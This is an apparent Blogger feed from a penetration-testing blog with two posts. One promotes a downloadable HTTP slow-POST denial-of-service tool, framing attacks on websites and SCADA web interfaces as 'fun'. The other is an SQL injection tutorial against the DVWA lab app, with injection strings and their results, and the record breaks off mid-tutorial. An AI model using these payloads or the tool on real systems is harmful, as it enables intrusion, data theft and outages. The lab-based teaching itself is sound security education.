tag:blogger.com,1999:blog-4569624426606394012024-03-21T04:58:21.949-07:00Penetration Engineer عدلیUnknownnoreply@blogger.comBlogger77125tag:blogger.com,1999:blog-456962442660639401.post-75717283897842001122010-11-28T18:00:00.000-08:002010-11-28T18:00:32.009-08:00Universal HTTP DoS - Are You Dead Yet?A generic flaw in the way HTTP works?<br />
Now that's the kinda stuff I always like to hear about.<br />
Oh, you mean to tell me that once again Web Application Firewalls cannot stop this attack?<br />
Allow me to put on my "surprised" face again. Of course WAF cannot handle this. WAF do not really detect traffic anomalies. WAF simply do what they were programmed to do - detect pre-defined white/black list patterns.<br />
Some boffins talked about this attack at OWASP:<br />
<br />
<a href="http://www.owasp.org/images/4/43/Layer_7_DDOS.pdf">http://www.owasp.org/images/4/43/Layer_7_DDOS.pdf</a><br />
<br />
So trivial we all wonder why nobody's thought of this prior to late 2010...<br />
We simply find a nice web form to flood with never-ending POST values.<br />
Add in connection concurrence in the tens-to-hundreds scale per client, et voilà:<br />
Application layer Denial-of-Service attack.<br />
At the time of this writing, I could not find any efficient PoC code. So I wrote my own.<br />
Introducing: "R-U-Dead-Yet" or R.U.D.Y.<br />
Distributed or not, this baby knocks down websites and web-enabled devices.<br />
Apache? No problem for R.U.D.Y. IIS escaped the SlowLoris attack? it won't escape this time. Think you're ok cuz you wrote in ASP.NET / Java / PHP / whatever? Guess again. This attack is universal!<br />
All you need could be an antique machine running Linux (tested and verified with Ubuntu).<br />
With built-in detection of web forms and form fields suitable for attack, and unattended execution using pre-defined configuration files, this tool is simple enough for anyone to use.<br />
I know not of any firewall / IPS, including WAF, that will currently cope with this attack.<br />
And of course, as cyber warfare is our current hype, SCADA systems using web interfaces can also be attacked, according to the researchers behind the idea. Considering automatic discovery of Web-facing SCADA equipment using the <a href="http://www.shodanhq.com/">SHODAN</a> search engine, this could be major...<br />
So without much further ado, let the mayhem, anarchy and general fun begin!<br />
<br />
Download R-U-Dead-Yet at:<br />
<br />
<a href="http://code.google.com/p/r-u-dead-yet/">http://code.google.com/p/r-u-dead-yet/</a><br />
<br />
<b>Reference:</b><br />
http://chaptersinwebsecurity.blogspot.com/2010/11/universal-http-dos-are-you-dead-yet.htmlUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-456962442660639401.post-49160772033220486352010-10-09T10:21:00.000-07:002010-10-09T10:22:55.126-07:00SQL Injection Walkthrough (DVWA)<span class="Apple-style-span" style="color: white; font-family: Arial; font-size: 8px; line-height: 10px;"></span><br />
<div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: medium;"><span style="font-family: Impact, serif;">(<a href="http://www.hackyeah.com/wp-content/uploads/2010/05/HackYeah-SQL-Injection.pdf" style="color: #a2a2a2; text-decoration: underline;" title="SQL Injection Walkthrough - PDF">A PDF VERSION CAN BE DOWNLOADED HERE</a>)</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Intro"></a><span style="font-family: Consolas, serif;"><span style="font-size: medium;"><strong>Intro:</strong></span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: x-small;"><span style="font-family: Consolas, serif;">The goal of this paper is to help explain and demonstrate some of the dangers of SQL injection. It is in no way complete, and it is far from comprehensive. If you have any comments, suggestions, corrections, etc…please send them to Trenton@HackYeah.com</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: x-small;"><span style="font-family: Consolas, serif;">I have always believed that the best way to learn is to do. For this reason, I have tried to provide the reader a reference to use when practicing SQL injection. You are highly encouraged to follow along and try the following examples as you read. </span></span><br />
<span id="more-84"></span><br />
<span style="font-size: x-small;"><span style="font-family: Consolas, serif;">For the rest of this tutorial we will use Damn Vulnerable Web App (DVWA) as our practice grounds. The sources listed at the end of this paper contains both a link to the DVWA download, and to the official install instructions. Do not install DVWA in a production environment. It could cause your host to be compromised (by the techniques listed below, among others).</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-size: x-small;"><span style="font-family: Consolas, serif;">I have used the XAMPP server package (Apache with MySQL) in a Windows environment for this walkthrough. This can be done with other web servers, or OS types, but some of the injections will need to be tailored accordingly.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Injection Intro"></a><span style="font-family: Consolas, serif;"><span style="font-size: medium;"><strong>Injection Intro:</strong></span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">The following definition has been borrowed from Wikipedia: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed … SQL injection attacks are also known as SQL insertion attacks.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Rephrased, this means that we may be able to use special input to trick the SQL server to do what we want it to do.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Formatting:</strong></span><span style="font-family: Consolas, serif;">The following injections can be split into three parts. For the sake of simplicity we will call these three parts the injection prefix, expression, and suffix. For the remainder of this paper I will refer to these three parts, when placed together, as the injection phrase. This will be </span><span style="color: red;"><span style="font-family: Consolas, serif;">red</span></span><span style="font-family: Consolas, serif;">in color – it is what you will insert into the text box. The whole query (the original SQL query plus our injection phrase) will be referred to as the SQL injection query. I have shown the whole query, so that you can better understand what the SQL server is processing after we insert the injection phrase.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The “</span><span style="font-family: Consolas, serif;"><em>injection prefix</em></span><span style="font-family: Consolas, serif;">” is a modification of an expected query that attempts to break us free of the expected input and place the rest of our input directly into the SQL query.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The “</span><span style="font-family: Consolas, serif;"><em>injection expression</em></span><span style="font-family: Consolas, serif;">” contains the specific query used to gain information or execute code.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">The “</span><span style="font-family: Consolas, serif;"><em>injection suffix</em></span><span style="font-family: Consolas, serif;">” will attempt to manage the formatting of the query to prevent unwanted syntax errors. This is usually done by commenting out the rest of the query. This task can also be accomplished by creating proper SQL syntax.</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="SQL Injection Walkthrough With DVWA"></a><span style="font-family: Consolas, serif;"><span style="font-size: medium;"><strong>SQL INJECTION WALKTHROUGH WITH DVWA</strong></span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Once you have XAMPP running correctly. Simply place the DVWA folder into your server’s root web directory (In a test environment only!). In this tutorial, DVWA will be located at c:\xampp\htdocs\dvwa.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Add the database login name and password to the DVWA configuration file located at …\dvwa\config\config.inc.php. With any web browser, go to <a href="http://127.0.0.1/dvwa" style="color: #a2a2a2; text-decoration: underline;">http://127.0.0.1/dvwa</a>. You will be prompt to “setup the database”. Click the noted link. If all goes well DVWA should note that setup was successful. Click on the “DVWA Security” tab. You will be prompted to insert a username and password. Log in with<strong>admin</strong> as the username and <strong>password</strong> as the password (They don’t call it DVWA for nothing). Set the security to low, and click submit. Click on the “SQL Injection” tab…we are now ready to go.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Although you can attack the server from the server (127.0.0.1 – localhost), If you want to use another computer to attack this vulnerable host, you will need to modify …\dvwa\.htaccess to include your network address. This helps prevent DVWA from being abused from outsiders.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">Insert the text from the following examples noted in <span style="color: red;">red</span> into the User ID box, and then click Submit to see what happens.</span></span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Check expected results"></a><span style="font-family: Consolas, serif;"><strong>Check expected results:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>1</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Results:</li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">ID:<span style="color: red;"><span style="font-family: Consolas, serif;">1</span></span> First name: admin<br />
Surname: admin</div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Note that we could cycle through each user to find out who, and how many there are. Something like this is an obvious information disclosure vulnerability.</li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Check for hanling of quotes"></a><span style="font-family: Consolas, serif;"><strong>Check for handling of quotes:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ‘</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>O’Malley</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">We will use something that looks benign to check for quote handling errors</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> </span><span style="font-family: Consolas, serif;">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near </span><span style="color: red;"><span style="font-family: Consolas, serif;">‘Malley</span></span><span style="font-family: Consolas, serif;">” at line 1</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">We can see that everything after the single quote is being treated as a SQL request.</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Check the results of an OR True statement - First Try"></a><span style="font-family: Consolas, serif;"><strong>Check the results of an OR True statement – First Try:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = ’</span></span><span style="font-family: Consolas, serif;"> </span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR 1=1;–</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><strong>Result:</strong></span><span style="font-family: Consolas, serif;"> </span><span style="font-family: Consolas, serif;">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘</span><span style="color: red;"><span style="font-family: Consolas, serif;">–</span></span><span style="font-family: Consolas, serif;">” at line 1</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">The </span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><span style="font-size: x-small;">-–</span></span></span><span style="font-family: Consolas, serif;"><span style="font-size: x-small;"> didn’t work as hoped. Ideally (for the attacker) this will cause the entire following query to be treated as a comment. Note the extra single quote at the end of the returned error. It must be expecting the single quote from user_id=’ to be closed. Let’s try something else…</span></span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://www.blogger.com/post-edit.g?blogID=456962442660639401&postID=4916077203322048635" name="Check the results of an OR True statement - Second Try"></a><span style="font-family: Consolas, serif;"><strong>Check the results of an OR True statement – Second Try:</strong></span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id = </span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;"><em><strong>‘</strong></em></span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR ”=’</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">Result:</span></span><span style="font-family: Consolas, serif;"> ID: a’ OR ”=’<br />
First name: admin<br />
Surname: admin</span></li>
</ul></li>
</ul><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">ID: a’ OR ”=’<br />
First name: Gordon<br />
Surname: Brown</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">ID: a’ OR ”=’<br />
First name: Hack<br />
Surname: Me</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">ID: a’ OR ”=’<br />
First name: Pablo<br />
Surname: Picasso</span></div><div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">ID: a’ OR ”=’<br />
First name: bob<br />
Surname: smith</span></div><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">For a lookup like this, one would only expect the first response to be displayed. If you look at the DVWA source code (Click the View Source tab in DVWA), you can see that a loop is created to cycle through each returned row. This is a bad idea because the expected input should have an expected output of only one result – Why they code this page to display more than one result is beyond be. I guess that’s why they call it DVWA.</span></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="font-family: Consolas, serif;">Note how we used AND </span><span style="color: red;"><span style="font-family: Consolas, serif;">‘’=’ </span></span><span style="font-family: Consolas, serif;">at the end of our injection. This takes care of the final single quote by making a statement that is always true</span><span style="color: red;"><span style="font-family: Consolas, serif;">‘’=’</span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">’</span></span></li>
</ul></li>
<li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">SELECT first_name, last_name FROM users WHERE user_id =’</span></span><span style="color: red;"><span style="font-family: Consolas, serif;"><em><strong>a’ OR ‘x’='x’;#</strong></em></span></span><span style="color: #0070c0;"><span style="font-family: Consolas, serif;">‘”</span></span><ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: white; font-family: Arial; font-size: 13px; line-height: 18px; margin-bottom: 0px; margin-left: 25px; margin-right: 0px; margin-top: 